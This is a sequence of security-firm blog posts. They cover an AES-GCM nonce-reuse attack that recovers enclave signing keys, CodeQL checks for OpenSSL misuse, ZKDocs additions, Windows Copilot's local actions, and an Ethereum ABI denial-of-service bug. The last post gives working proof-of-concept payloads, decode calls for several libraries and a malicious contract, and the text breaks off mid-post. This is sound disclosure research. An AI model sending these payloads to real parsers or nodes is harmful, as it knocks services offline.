The competition’s Program Manager, Perri Adams, hosted a streaming event to kick off registration and provide a number of technical updates. We’re particularly excited about this update because it is our first look at the challenge problems our CRS must solve and the scoring criteria that will be used to evaluate our system’s generated software patches. Check back in with us here later this month to hear our thoughts on the AIxCC’s challenges, scoring methods, and rules. In the meantime, we wish our competitors luck—but they should know that Trail of Bits is in it to win it!

Relevant links:

A trail of flipping bits

18 December 2023 at 13:30

By Joop van de Pol

Trusted execution environments (TEE) such as secure enclaves are becoming more popular to secure assets in the cloud. Their promise is enticing because when enclaves are properly used, even the operator of the enclave or the cloud service should not be able to access those assets. However, this leads to a strong attacker model, where the entity interacting with the enclave can be the attacker. In this blog post, we will examine one way that cryptography involving AES-GCM, ECDSA, and Shamir’s secret sharing algorithm can fail in this setting—specifically, by using the Forbidden attack on AES-GCM to flip bits on a private key shard, we can iteratively recover the private key.

The Trail of Bits mascot, an octopus, wears a detective's fedora and examines a trail of bits (0s and 1s) through a magnifying glass.

Trusted Enclaves

TEEs come in all shapes and sizes. They can be realized using separate secure hardware, such as Hardware Security Modules (HSM), Trusted Platform Modules (TPM), or other dedicated security chips as part of a system on chip (SoC). It’s also possible to implement them in hardware that is shared with untrusted entities, using memory isolation techniques such as TrustZone or a hypervisor. Examples in this category are secure enclaves such as Intel SGX, Amazon Nitro, etc.

One challenge secure enclaves face is that they have little to no persistent memory, so large amounts of data that need to be available across power cycles must be stored outside the enclave. To keep this data secure, it must be encrypted using a storage key that is stored either inside the trusted environment or inside an external Key Management Service (KMS) that restricts access to the enclave (e.g., through some form of attestation).

Figure 1: Design of a typical secure enclave, where encrypted data is stored outside the enclave and the data encryption key is securely stored outside the enclave in a KMS

However, because the data is stored externally, the untrusted entity interacting with the enclave will see this data and can potentially modify it. Even when using strong cryptography such as authenticated encryption—typically Authenticated Encryption with Additional Data (AEAD)—it is very difficult for the enclave to protect itself against rollback attacks, where the untrusted entity replaces the external data with an earlier version of the same data since both of them will pass authentication. A tempting solution would be to version data stored externally to the enclave, but because the enclave is stateless and doesn’t know what the latest version should be, this quickly becomes a chicken-and-egg problem. Therefore, keeping track of version numbers or usage counters in this setting is difficult, if not impossible.

Signing in a trusted enclave

One interesting application for trusted enclaves is holding digital signature private keys (such as ECDSA keys) to perform signing. If set up correctly, no one can exfiltrate the signing keys from the enclave. However, because the signing keys must be available even after a power cycle of the enclave, they must typically be stored persistently in some external storage. To prevent anyone with access to this external storage from obtaining or modifying the signing key, it needs to be encrypted using an AEAD.

Figure 2: Design for signing with a trusted enclave, where the encrypted signing key is stored outside the enclave and encrypted with a key protected and managed by a KMS

Enter everyone’s favorite AEAD: AES-GCM! Due to its brittle design, the authentication guarantees are irrevocably broken as soon as the nonce is reused to encrypt two different signing keys. Because the AES block size is limited to 128 bits and because you need 32 bits for the counter, you have only 96 bits for your nonce. No worries, though; you just have to make sure you don’t invoke AES-GCM with the same secret key using random nonces more than 232 times! So the enclave just has to keep track of a usage counter. Alas, as previously stated, that’s basically impossible.1

Figure 3: Preventing AES-GCM misuse in an enclave requires maintaining state to monitor AES-GCM usage and must prevent rollback attacks where an attacker replays an old state, though this is difficult to achieve in practice.

So an attacker can have the enclave generate an arbitrary number of signing keys, all of which it must encrypt to store them externally. Eventually, the nonce will repeat, and the attacker can recover the AES-GCM hash key using the Forbidden attack. The details are not very important, but essentially, with the AES-GCM hash key, the attacker can take any existing AES-GCM ciphertext and tag, modify the ciphertext in some way, and use the hash key to update the tag. Specifically, they can flip bits in the ciphertext, which, when decrypted by the enclave, will result in the original plaintext except that the same bits will be flipped. This is not good. But how bad is it?

Attacking ECDSA signatures

The attack is not specific to ECDSA, so understanding all the specific mathematics behind ECDSA is not required. The only important background needed to understand the attack is an understanding of how ECDSA key pairs are constructed. The private key corresponds to a number (also called a scalar) d. To obtain the corresponding public key Q, the private key is multiplied by the base point G of the specific elliptic curve you want to use.

Q = d · G

By leveraging the broken AES-GCM authentication, the attacker can flip bits in the encrypted private key and have the enclave decrypt it and use it to sign a message. As the encryption part of AES-GCM is essentially counter mode, flipping bits in the encrypted private key will cause the same bit flips in the corresponding plaintext private key.

Figure 4: By modifying the ciphertext stored in external storage, an attack can cause the secure enclave to sign messages with a modified key without having to target the enclave itself.

What happens when we flip the least significant bit of the private key? A zero bit would become a one, which is equivalent to adding one to the private key. Conversely, a one bit would become a zero, which is equivalent to subtracting one from the private key. Essentially, the effect that the bit flip has on the private key depends on the unknown value of the private key bit.

That’s great, but how can we know which of these two options happened without knowing the private key? Well, if we generate a signature with the flipped private key, we can verify the signature using a modified public key by adding or subtracting the generator. If it verifies with the added generator, we know that the private key bit was zero, whereas if it verifies with the subtracted generator, we know that the private key bit was one.

(d + 1) · G = d · G + G = Q + G

(d – 1) · G = d · GG = QG 

We can now repeat the process to recover other bits of the private key. Instead of adding or subtracting one, we’ll be adding or subtracting a power of two from the private key. By adding or subtracting the corresponding multiples of the generator from the public key, we learn a new bit of the private key. It’s not strictly necessary to recover one bit at a time. You can flip multiple bits and try signature verification based on all the possible effects these flipped bits can have on the private key.

Splitting the bit

Interestingly, the attack still works when the private key is split into different shards using Shamir’s secret sharing algorithm before encryption. The enclave receives the different encrypted shards, decrypts them, recombines the shards into the private key, and then signs. As a result, we cannot directly flip individual bits in the private key.

But what happens when we flip a bit in one of the shards? In Shamir’s secret sharing (see also our excellent ZKDocs article on this topic), each shard consists of a pair of x and y values that are used to interpolate a polynomial using Lagrange interpolation. The secret value is given by the value of the interpolated polynomial when evaluated at x = 0.

Flipping bits in one of the y values changes the interpolated polynomial, which corresponds to a different secret—in our case, the private key. Basically, recombining the secret corresponds to a sum of weighted y values, where each weight is a Lagrange coefficient λj that can easily be computed from the x coordinates (which are typically chosen to be consecutive integers starting from one up to the number of shards).

Putting all this together, flipping bits in one of the shares adds to or subtracts from the share, depending on the value of the bit. This then results in adding or subtracting a multiple of the corresponding Lagrange coefficient λj from the private key. By generating signatures with this modified private key and validating them using modified public keys, we can recover the values of the secret shares bit by bit. After obtaining the shares, we can recombine them into the private key. All in all, this shows that the enclave operator could extract the private key from the enclave, despite all the cryptography and isolation involved.

Final bit

As this exploration of the Forbidden attack on AES-GCM in secure enclaves reveals, cryptographic primitives such as AES-GCM, ECDSA, and Shamir’s secret sharing, while generally robust, may still be vulnerable if deployed incorrectly. The complexity of TEEs and the evolving nature of adversarial methods make safeguarding sensitive data a difficult task. At Trail of Bits, we understand these challenges. Using our deep expertise in cryptography and application security, we provide comprehensive system audits, identifying potential vulnerabilities and offering effective mitigation strategies. By partnering with us, developers can better avoid potential cryptographic pitfalls and improve the overall security posture of their TEEs.
1 You could argue that, in this toy example, the KMS could keep track of the usage counter because it controls access to the storage key. However, in practice, the KMS is usually quite limited in the type of data it can encrypt and decrypt (typically only cryptographic keys). It is likely not possible to encrypt secret key shards, for example.

Summer interns 2023 recap

20 December 2023 at 14:00

This past summer at Trail of Bits was a season of inspiration, innovation, and growth thanks to the incredible contributions of our talented interns, who took on a diverse range of technical projects under the mentorship of Trail of Bits engineers. We’d like to delve into their accomplishments, from enhancing the efficiency of fuzzing tools and improving debugger performance to exploring the capabilities of deep learning frameworks.

Xiangan He: Scalable Circom determinacy checking with Circomference

Xiangan He’s work this summer was focused on building a tool to check for missing constraints and nondeterminacy in production-scale zero-knowledge (ZK) circuits. Existing security tools for these circuits were limited in their ability to handle circuits with more than 10 million constraints, prompting the development of Circomference. Inspired by tools like Picus and Ecne, Circomference uses easily swappable SMT solver backends orchestrated by a fast Rust orchestrator and determinacy propagator to scrutinize the determinacy of larger, more complex circuits commonly encountered in real-world scenarios.

Determinacy checking is crucial for identifying bugs within zero-knowledge circuits. Xiangan’s project demonstrated that tools like Circomference and Picus could detect vulnerabilities in 98.6% of a sample of 250 ZK circuits with known vulnerabilities. Moreover, due to improved memory usage and propagation heuristics, Circomference easily handles circuits that quickly cause Picus to run out of system RAM.

Circomference not only excels in efficiency but also effectively detects nondeterminacy in circuits used in real audits, making it invaluable for ensuring the integrity and security of zero-knowledge circuits.

Michael Lin: Fuzzing event tracing for Windows (ETW)

Michael Lin embarked on a project focused on fuzzing applications that consume events using Event Tracing for Windows (ETW). ETW plays a crucial role in Windows systems, serving various components and endpoint detection and response (EDR) solutions. However, since anyone can register a provider with the correct GUID, this process is vulnerable to exploitation.

Michael’s team began by selecting interesting EDRs and reverse engineering them to identify the providers they consumed events from. Since no existing testing or fuzzing frameworks matched the complexity of inter-process communication mechanisms like ETW, they had to develop their own.

The fuzzer they created aimed to generate random events sent to these providers with the goal of uncovering parsing bugs. It encountered intriguing challenges along the way, including difficulty in bypassing Windows process protection and in tracking fuzzing progress. Nonetheless, the team successfully automated much of the process and plans to apply the approach to other applications utilizing ETW.

Matheus Borella: Enhancing GDB and pwndbg

Matheus Borella’s summer project involved making improvements to GDB and pwndbg, a GDB plugin for reverse engineering and exploit development, with a particular focus on enhancing performance and adding features.

One remarkable achievement was a significant reduction in debugger startup times for users leveraging GDB Indexes. This change demonstrated a substantial speed improvement of up to 20 times during testing. Additionally, Matheus introduced features like adding __repr__ for certain Python types and sent patches (still to be merged) that extend the Python API with custom type creation and runtime symbol addition, enhancing GDB’s debugging and reverse engineering capabilities.

Their work also brought several quality-of-life improvements to pwndbg, including experimental use-after-free detection and new commands (plist, stepuntilasm, and break-if-[not-]taken). Along the way, they even discovered and fixed a bug in QEMU that had been causing GDB crashes in certain cases.

Patrick Dobranowski: Evaluating LLMs for security

Patrick Dobranowski’s project addressed the need to assess the effectiveness of large language models (LLMs) in various domains. Patrick’s project was to create a means to more easily determine which models are good at which tasks. During development, we also noticed existing metrics fell short in topics of interest to Trail of Bits, like Solidity language comprehension. Patrick then worked to create an evaluation framework, extended from HumanEval, to assess Solidity code comprehension.

Sanketh Menda: Empowering developers with ZKDocs

Sanketh Menda worked on addressing the gap between protocols described in cryptography research papers and implementations of the same protocols. In particular, they focused on zero-knowledge proofs and contributed content on the Inner Product Argument and its applications to polynomial commitment schemes to ZKDocs, distilling these protocols into their essential implementation details.

Sanketh also worked alongside the cryptography team on security assessments of zero-knowledge-related codebases, gaining hands-on experience in the field.

Kevin Chen: Investigating PyTorch for deep learning security

Kevin Chen’s project explored the correctness and security of PyTorch, a widely used Python framework for deep learning. While PyTorch is celebrated for its simplicity and efficiency, its intricate inner workings posed questions about correctness.

Kevin initially focused on PyTorch’s automatic differentiation engine, known as autograd, which is fundamental for neural network training. His meticulous study, leveraging dataflow analysis and debuggers, concluded that PyTorch developers adhere to critical rules. Kevin’s work uncovered insights into PyTorch’s code generation practices and identified potential areas for future research.

Sameed Ali: A fuzzer that actually follows directions!

In the realm of directed fuzzing, where tools use metrics like shortest-path-to-target(s) to discover specific code locations, Sameed’s work stands out. His project extended LibAFL to create a fuzzer that can genuinely follow directions and generates inputs that satisfy a sequence of preconditions.

Traditional reachability metrics often fall short in capturing the complexity of real-world bugs, as exploits often require a specific sequence of preconditions to be satisfied. Sameed’s innovative approach takes a sequence of targets and dynamically updates the shortest-path-to-target metric calculation as progress is made. This approach allows the fuzzer to generate inputs that hit more complex bugs, significantly advancing the state of the art in directed fuzzing.

Apply to our intern program!

The dedication and innovation of our interns underscore Trail of Bits’ commitment to advancing cybersecurity and technology. It was such a pleasure to work with the Summer Interns cohort this year, and we can’t wait to see what they accomplish next.

We’ll be opening up our Summer Interns application process in January next year!

Catching OpenSSL misuse using CodeQL

22 December 2023 at 14:00

By Damien Santiago

I’ve created five CodeQL queries that catch potentially potent bugs in the OpenSSL libcrypto API, a widely adopted but often unforgiving API that can be misused to cause memory leaks, authentication bypasses, and other subtle cryptographic issues in implementations. These queries—which I developed during my internship with my mentors, Fredrik Dahlgren and Filipe Casal—help prevent misuse by ensuring proper key handling and entropy initialization and checking if bignums are cleared.

To run our queries on your own codebase, you must first download them from the repository using the following command:

codeql pack download trailofbits/cpp-queries

To run the queries on a pre-generated C or C++ database using the CodeQL CLI, simply pass the name of the query pack to the tool as follows:

codeql database analyze database.db \
    --format=sarif-latest        \
    --output=./tob-cpp.sarif -- trailofbits/cpp-queries

Now, with that out of the way, let’s dig into the actual queries I wrote during my internship.

Oh no, not my keys!

Using a too-short key when initializing a cipher using OpenSSL can lead to a serious problem: the OpenSSL API will still accept this key as valid and simply read out of bounds when the cipher is initialized, potentially initializing the cipher with a weak key and leaving your data vulnerable. For this reason, we decided to make a query that tested for too-short keys by checking the key size against the algorithm being used. Fortunately for us, OpenSSL uses a naming scheme that makes it easy to implement this query. (More on that later.)

Below is the definition of the function EVP_EncryptInit_ex, which is used to initialize a new symmetric cipher.

Notice how the function takes a key as the fourth argument. With this in mind, we can use CodeQL to define a Key type in CodeQL using data flow analysis. If there is data flow from a variable into the key parameter of EVP_EncryptInit_ex, the variable most likely represents a key (or, at the very least, is used as one). Thus, we can define what a key is using CodeQL as follows:

Here, we use data flow to ensure that the key flows into the key parameter of a call to EVP_EncryptInit_ex. This works since the statement containing the cast will evaluate to true only if init satisfies the CodeQL definition of EVP_EncryptInit_ex (i.e., if it represents a call to a function with the name EVP_EncryptInit_ex). The call to getKey() simply returns the position of the key parameter in the call to EVP_EncryptInit_ex.

Next, we need to be able to evaluate the size of a key using CodeQL. In order to check if a given key has the correct size, we need to know two things: the size of the key and the key size of the cipher the key is passed to. Obtaining the size of the key is simple, as Codeql has a getSize() predicate that returns the size of the type in bytes. The call to getUnderlyingType() is used to resolve typedefs and get the underlying type of the key.

Now, we need to identify what the size of the key should be. This clearly depends on which cipher that is used. However, CodeQL doesn’t know what a cipher is. In OpenSSL, each cipher exposed by the high-level EVP API is an instance of the type EVP_CIPHER, and each cipher is initialized using a particular function from the API. For example, if we want to use AES-256 in CBC-mode, we pass an instance of EVP_CIPHER returned from EVP_aes_256_cbc() to EVP_EncryptInit_ex. Since the API name contains the name of the cipher, we can use the getName() and matches() predicates in CodeQL to compare the names of function calls to patterns in the names of the ciphers.

Since the cipher is given by (the return value of) a function call, and we want to match against the name of the target function, we need to use getTarget() to get the underlying target of the call. To constrain the key size of the cipher, we add a field for the key size and constrain the value of the field in the constructor.

Next, we need to check if the key passed to the cipher is equal to the expected size. However, we have to be careful and check that the cipher we’re comparing against is actually used together with the key, as opposed to grabbing some random cipher instance from the codebase. Let’s first define a member predicate on the Key type that checks the size of the key against the key size of a given cipher.

As we have noted, this predicate does not restrict the cipher to ensure that the key is used together with the cipher. Let’s add another predicate to Key that can be used to obtain all ciphers that the key is used together with. This means that the cipher is passed as a parameter in the call to EVP_EncryptInit_ex where the key is used. (Note that the key may be used with different ciphers in different locations in the codebase.)

That’s it! The final query, as well as a small test case to demonstrate how the Key and EVP_CIPHER types work, can be found on GitHub.

My engine’s falling apart!

OpenSSL 1.1.1 supports dynamic loading of cryptographic modules called engines at runtime. This can be used to load custom algorithms not implemented by the library or to interface with hardware. However, to be able to use an engine, it must first be initialized, which requires the user to call a few different functions in a specific order. First, you must select an engine to load, call the engine initialization function, and then set the mode of operation for the engine. Failing to initialize the engine could potentially lead to invalid outputs or segmentation faults. Failing to set the engine as the default could mean that a different implementation is used by OpenSSL. To create a query to detect if a loaded engine is properly initialized, we decided to use data flow to check if the correct functions were called to initialize the loaded engine.

After reading the documentation on the OpenSSL engine API, it seems that the API user can create an engine object in a few different ways. We decided to write a CodeQL class that simultaneously captured the four different functions a user could use to load a new engine. (These functions either create a new unselected instance, create a new instance selected by ID, or select an engine from a list using “previous” and “next” style function names.)

Next, we needed to check that the user initialized the newly created engine object using ENGINE_init, which takes the engine object as a parameter. Not only does this function initialize the engine, it also performs error checking to make sure the engine is working properly. As a result, it’s important that the user does not forget to call this function.

The third and final function that the user needs to call is ENGINE_set_default, which is used to register the engine as the default implementation of the specified algorithms. Engine_set_default takes an engine and a flag parameter. We create a CodeQL type that represents this function ENGINE_init above.

Now that we have defined the functions used to initialize a new engine using CodeQL, we need to define what the corresponding data flow should look like. We want to make sure that data flows from CreateEngine to ENGINE_init and ENGINE_set_default.

To finalize this query and put it all together, we flag if a loaded engine is not passed to either ENGINE_init or ENGINE_set_default. The complete query and a corresponding test case can be found on GitHub.

Moving forward

The OpenSSL libcrypto API is full of sharp edges that could create problems for developers. As with every cryptographic implementation, the smallest of mistakes can lead to serious vulnerabilities. Tools such as CodeQL help shine a light on these issues by allowing developers and code reviewers the opportunity to build and share queries to secure their code. I invite you not only to try out our queries found in our GitHub repository (which also contains additional queries for both Go and C++), but to open your IDE of choice and create some of your own amazing queries!

We’ve added more content to ZKDocs

26 December 2023 at 14:00

By Jim Miller

We’ve updated ZKDocs with four new sections and additions to existing content. ZKDocs provides explanations, guidance, and documentation for cryptographic protocols that are otherwise sparingly discussed but are used in practice. As such, we’ve added four new sections detailing common protocols that previously lacked implementation guidance:

We’ve also added a new subsection to our random sampling section that details an effective random sampling technique known as wide modular reduction. This technique is well known in certain cryptographic circles but to our knowledge has not been widely publicized.

This post summarizes each of these additions at a high level.

ICYMI: What is ZKDocs? Almost two years ago, we first released our website ZKDocs to provide better implementation guidance for non-standard cryptographic protocols. ZKDocs provides high-level summaries, protocol diagrams, important security considerations, and more for common non-standardized cryptographic protocols, like zero-knowledge proofs.

The inner product argument (IPA)

If you follow the cryptographic world, you may have heard of Bulletproofs, a type of zero-knowledge proof that has become popular in recent years. Despite their popularity, few people actually understand how these proofs actually work in detail because they are quite complicated! To get a sense for their complexity, check out this excellent protocol diagram from the dalek cryptography Bulletproofs implementation:

Bulletproofs protocol diagram (source)

The fundamental building block of Bulletproofs is the IPA. Like most cryptographic protocols, the IPA and Bulletproofs are so complex because they have been iteratively improved and refined over many years by theorists. The finished protocol is difficult to understand without the prior context of previous, simpler iterations. Fortunately, our new section in ZKDocs breaks down the IPA into simpler constructions and shows how these improvements can be made to achieve the final protocol being used today. Like all of ZKDocs, this section contains helpful protocol diagrams and important security considerations.

Commitment schemes

The concept of cryptographic commitment schemes is relatively intuitive: one person, the committer, first produces a cryptographic commitment that hides some secret value from all other observers, and then at a later time opens the commitment to reveal this value. For secure schemes, the commitment does not leak any information about the secret, and it’s impossible for the committer to equivocate on what this secret value was. The traditional commitment scheme allows the committer to commit to and reveal a specific value, usually an integer modulo a prime number.

Polynomial commitments are a generalization of scalar commitment schemes and an important building block in zero-knowledge protocols. Polynomial commitment schemes (PCSs) allow one party to prove to another the correct evaluation of a polynomial at some set of points, without revealing any other information about the polynomial.

We’ve updated ZKDocs with an explanation of the most common commitment scheme, Pedersen commitments, as well as of two common PCSs: the IPA PCS (derived from the IPA) and the KZG PCS.

Wide modular reduction

Many aspects of cryptography often deal with random values and prime numbers; a common requirement for various protocols is needing to generate a random value between 0 and p for some prime p. While this may sound relatively straightforward, in practice it is tricky to do securely.

The problem is that computers deal with bits and bytes. Typically, random number generators will produce a random number between 0 and 2n, where n is the number of requested random bits. Unfortunately, 2n is not a prime number and therefore cannot be directly used to generate a value between 0 and p for some p. This fundamental mismatch causes many people to generate their random numbers using the following obvious, simple, and INSECURE METHOD, which we detail in ZKDocs:

Insecure random sampling mod p (source)

ZKDocs documents a few different techniques to avoid the modulo bias described in the figure above. The nicest technique is known as wide modular reduction, and the concept is simple: if you have a prime p that has k bits, then generate a (k + 256)-bit random value (where 256 is a security parameter that can be tuned) and then reduce it mod p. (Note that this will also work with composite moduli, so p does not even have to be prime, but we use a prime since it is a common example). If you’re curious why this method is secure, the newest addition to ZKDocs breaks down the statistical argument as to why that’s the case.

We need your help!

We want to actively maintain and grow the content of ZKDocs. To make ZKDocs as effective as possible, we want to ensure that new content is helpful to the community. If you enjoy ZKDocs, please let us know what other content you’d like us to add! The best way to let us know is by raising an issue directly on the ZKDocs GitHub page.

AI In Windows: Investigating Windows Copilot

27 December 2023 at 14:00

By Yarden Shafir

AI is becoming ubiquitous, as developers of widely used tools like GitHub and Photoshop are quickly implementing and iterating on AI-enabled features. With Microsoft’s recent integration of Copilot into Windows, AI is even on the old stalwart of computing—the desktop.

The integration of an AI assistant into an entire operating system is a significant development that warrants investigation. In this blog post, I’d like to share the results of my brief investigation into how Microsoft has integrated Copilot into its legacy desktop system. I’ll summarize some key features of the integration and explore some of the concerns and future considerations of the role of AI in desktop environments.

Some caveats

Before we get into the details, there are two important caveats to keep in mind.

First, and most importantly, Microsoft Copilot works only with a functioning internet connection. This tells us that the models in use are hosted, not local, and that by necessity, some data from your machine is sent to Microsoft whenever AI features are used.

Second, as with other AI-enabled tools, Copilot’s results aren’t always stable or reliable. The fact that Copilot can give you something unexpected takes some getting used to and requires an initial trial-and-error period to discover what works and what doesn’t. This implies that even well-resourced public deployments of generative AI have not sufficiently mitigated the hallucination problem.

Copilot in Windows

In the most recent Windows 11 release, Microsoft officially introduced Windows Copilot—an everyday AI companion that exists on the desktop and is ready to answer any question. According to Microsoft,

Copilot will uniquely incorporate the context and intelligence of the web, your work data and what you are doing in the moment on your PC to provide better assistance – with your privacy and security at the forefront.

On Windows builds that support Copilot, you’ll be able to see a new desktop icon that opens a side pane to the Copilot interface:

While this pane may look brand new, under the surface it is simply a view into Microsoft Edge running Bing AI inside an msedge.exe process. However, Copilot does include some new features and abilities beyond what “regular” Bing AI can do.

Just like Bing AI, Copilot does not have a local AI model. All queries and operations are done via a web interface to remote machines that process requests and return answers. Therefore, Copilot requires an active internet connection to function. Copilot will search its own knowledge base or access the web to give you answers to any questions you ask (and just like with any LLM, those answers may be confidently incorrect). By default, Copilot will perform only general web queries and won’t access any user data or data related to the current web session. However, even in that default state, Copilot does have access to metadata provided by the browser and operating system, such as the IP address, location (as provided by the browser), and preferred language.

An optional setting (which is disabled by default) allows Copilot to access the current browser session to collect information about the URLs and titles of the currently open web pages and the content of the active web page. It should not have access to any private data such as passwords or browser history.

Copilot comes with other capabilities beyond the ability to answer basic queries. The first is an integration with DALL-E to generate AI art. You can access this feature through general requests to Copilot or by typing #graphic_art(“prompt”). For example, typing #graphic_art(“tree”) will generate a picture of a tree.

Another interesting capability allows users to access hard-coded local operations through the #win_action(“command”) prompt. Each action results in a message from Copilot asking for user confirmation before performing the action. Here is the list of hard-coded #win_action options that seem to be available at the moment:

Operation Description Required Parameters Example Command
change_volume_level Increase or decrease the audio volume level by 10 points “increase” or “decrease” #win_action(“change_volume_level”, “increase”)
launch_app Open an installed app The name of the application to open #win_action(“launch_app”, “Calculator”)
list_apps Get a list of installed apps N/A #win_action(“list_apps”)
launch_screen_cast Cast your screen to a wireless device N/A #win_action(“launch_screen_cast”)
launch_troubleshoot Open one of the audio, camera, printer, network, Bluetooth, or Windows update troubleshooters The troubleshooting category #win_action(“launch_troubleshoot”, “Audio”)
manage_device Open device settings to add, remove, or manage devices N/A #win_action(“manage_device”)
mute_volume Mute or unmute the audio “mute” or “unmute” #win_action(“mute_volume”, “mute”)
set_bluetooth Enable or disable Bluetooth “on” or “off” #win_action(“set_bluetooth”, “on”)
set_change_theme Change the color theme “dark” or “light” #win_action(“set_change_theme”, “dark”)
set_do_not_disturb Enable or disable “do not disturb” mode “on” or “off” #win_action(“set_do_not_disturb”, “on”)
set_focus_session Set a focus session for a requested number of minutes A number of minutes #win_action(“set_focus_session”, “30”)
set_volume Set the audio volume level to a specified value A number between 0 and 100, representing volume percentage #win_action(“set_volume”, “50”)
set_wallpaper Personalize your background (i.e., open the Personalization > Background page in settings) N/A #win_action(“set_wallpaper”)
snap_window Snap your active windows and share many app windows on a single screen “left”, “right”, or “none”

Choosing “none” allows you to select the layout you prefer.

#win_action(“snap_window”, “left”)
start_snipping_tool Take a screenshot using the Snipping Tool (Optional)

A number between 0 and 30 to specify a delay before the screenshot is taken

Default: 3 seconds

#win_action(“start_snipping_tool”, “5”)

Currently, while all these actions are local, they cannot be used while the machine is offline. As Copilot matures, we look forward to seeing what new capabilities it can provide.

Even though Microsoft Copilot is in its early stages, it demonstrates significant capabilities. But as with any cloud-based AI application, it raises security and privacy concerns. These concerns center mainly around the fact that queries must be sent to a server for processing, and they might be stored, used to further train the AI model, or shared with other companies for various purposes (such as personalized advertising). Additionally, Copilot’s capacity to affect change on local systems is particularly noteworthy. This functionality introduces new concerns regarding the role of AI in desktop environments, a role that extends beyond the reach of most current AI-enabled products. For example, the ability to access local operations through Copilot could help attackers perform local actions on a machine without being detected; and if Microsoft expands the list of available operations in the future, this concern would only grow. Though the integration of AI into desktop environments is an exciting development, these concerns will have to be a critical focus of developers and researchers as Microsoft continues iterating on Copilot, and as more AI–operating system integrations inevitably enter the scene.

Billion times emptiness

29 December 2023 at 14:00

By Max Ammann

Behind Ethereum’s powerful blockchain technology lies a lesser-known challenge that blockchain developers face: the intricacies of writing robust Ethereum ABI (Application Binary Interface) parsers. Ethereum’s ABI is critical to the blockchain’s infrastructure, enabling seamless interactions between smart contracts and external applications. The complexity of data types and the need for precise encoding and decoding make ABI parsing challenging. Ambiguities in the specification or implementation may lead to bugs that put users at risk.

In this blog post, we’ll delve into a newfound bug that targets these parsers, reminiscent of the notorious “Billion Laughs” attack that plagued XML in the past. We uncover that the Ethereum ABI specification was written loosely in parts, leading to potentially vulnerable implementations that can be exploited to cause denial-of-service (DoS) conditions in eth_abi (Python), ethabi (Rust), alloy-rs and ethereumjs-abi, posing a risk to the availability of blockchain platforms. At the time of writing, the bug is fixed only in the Python library. All other libraries decided on full disclosure through GitHub issues.

What is the Ethereum ABI?

Whenever contracts on the chain interact or off-chain components talk to the contracts, Ethereum uses ABI encoding for encoding requests and responses. The encoding does not describe itself. Instead, encoders and decoders need to provide a schema that defines the represented data types. Compared to the platform-dependent ABI in the C programming language, Ethereum specifies how data can be passed between applications in binary representation. Even though the specification is not formal, it gives a good understanding of how data is exchanged.

Currently, the specification lives in the Solidity documentation. The ABI definition influences the types used in languages for smart contracts, like Solidity and Vyper.

Understanding the bug

Zero-sized types (ZST) are data types that take zero (or minimal) bytes to store on disk but substantially more to represent once loaded in memory. The Ethereum ABI allows zero-sized-types (ZST). ZSTs can cause a denial of service (DoS) attack by forcing the application to allocate an immense amount of memory to handle a tiny amount of on-disk or over-the-network representation.

Consider the following example: What will happen when a parser encounters an array of ZSTs? It should try to parse as many ZST as the array claims to contain. Because each array element takes zero bytes, defining an enormously large array of ZSTs is trivial.

As a concrete example, the following figure shows a payload of 20 on-disk bytes, which will deserialize to an array of the numbers 2, 1, and 3. A second payload of 8 on-disk bytes will deserialize to 232 elements of a ZST (like an empty tuple or empty array).

This would not be a problem if each ZST took up zero bytes of memory after parsing. In practice, this is rarely the case. Typically, each element will require a small but non-zero amount of memory to store, leading to an enormous allocation to represent the entire array. This leads to a denial of service attack.

Robust parser design is crucial to prevent severe issues like crashes, misinterpretations, hangs, or excessive resource usage. The root cause of such issues can lie in either the specifications or the implementations.

In the case of the Ethereum ABI, I argue that the specification itself is flawed. It had the opportunity to explicitly prohibit Zero-Size Types (ZST), yet it failed to do so. This oversight contrasts with the latest Solidity and Vyper versions, where defining ZSTs, such as empty tuples or arrays, is impossible.

To ensure maximum safety, file format specifications must be crafted carefully, and their implementations must be rigorously fortified to avoid unforeseen behaviors.

Proof of concept

Let’s dive into some examples that showcase the bug in several libraries. We define the data payload as:

0000000000000000000000000000000000000000000000000000000000000020
00000000000000000000000000000000000000000000000000000000FFFFFFFF

The payload consists of two 32-byte blocks describing a serialized array of ZSTs. The first block defines an offset to the array’s elements. The second block defines the length of the array. Independent of the programming language, we will always reference it as payload.

We will try to decode this payload using the ABI schemata ()[] and uint32[0][] using several different Ethereum ABI parsing libraries. The former representation is a dynamic array of empty tuples, and the latter is a dynamic array of empty static arrays. The distinction between dynamic and static is important because an empty static array takes zero bytes, whereas a dynamic one takes a few bytes because it serializes the length of the array.

eth_abi (Python)

The following Python program uses the official eth_abi library (<4.2.0); the program will first hang and then terminate with an out-of-memory error.

from eth_abi import decode
data = bytearray.fromhex(payload)
decode(['()[]'], data)

The eth_abi library only supported the empty tuple representation; an empty static array was undefined.

ethabi (Rust)

The ethabi library (v18.0.0) allows triggering the bug directly from its CLI.

cargo run -- decode params -t "uint32[0][]" $payload

ethers-rs (Rust)

The following Rust program uses the ethers-rs library and the schema uint32[0][] implicitly through the Rust type Vec<[u32; 0]>, which corresponds to it.

use ethers::abi::AbiEncode;
let data = hex::decode(payload);
let _ = Vec::<[u32; 0]>::decode(&hex_output.unwrap()).unwrap();

It is vulnerable to the DoS issue because the ethers-rs library (v2.0.10) uses ethabi.

foundry (Rust)

The foundry toolkit uses ethers-rs, which suggests that the DoS vector should also be present there. It turns out it is!

One way to trigger the bug is by directly decoding the payload via the CLI, just like in ethabi.

cast --abi-decode "abc()(uint256[0][])" $payload

Another, more interesting proof of concept is to deploy the following malicious smart contract. It uses assembly to return data that matches the payload.

contract ABC {
    fallback() external {
        bytes memory data = abi.encode(0x20, 0xfffffffff);

        assembly {
            return(add(data, 0x20), mload(data))
        }
    }
}

If the contract’s return type is defined, it can lead to a hang and huge memory consumption in the CLI tool. The following command calls the contract on a testnet.

cast call --private-key \
0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80 \
-r http://127.0.0.1:8545 0x5fbdb2315678afecb367f032d93f642f64180aa3 \
"abc() returns (uint256[0][])”

alloy-rs

The ABI parser in alloy-rs (0.4.2) encounters the same hang as the other libraries if the payload is decoded.

use alloy_dyn_abi::{DynSolType, DynSolValue};
let my_type: DynSolType = "()[]".parse().unwrap();
let decoded = my_type.abi_decode(&hex::decode($payload).unwrap()).unwrap();

ethereumjs-abi

Finally, the ABI parser ethereumjs-abi (0.6.8) library is also vulnerable.

var abi = require('ethereumjs-abi')
data = Buffer.from($payload", "hex")
abi.rawDecode([ "uint32[]" ], data)
// or this call: abi.rawDecode([ "uint32[0][]" ], data)

Other libraries

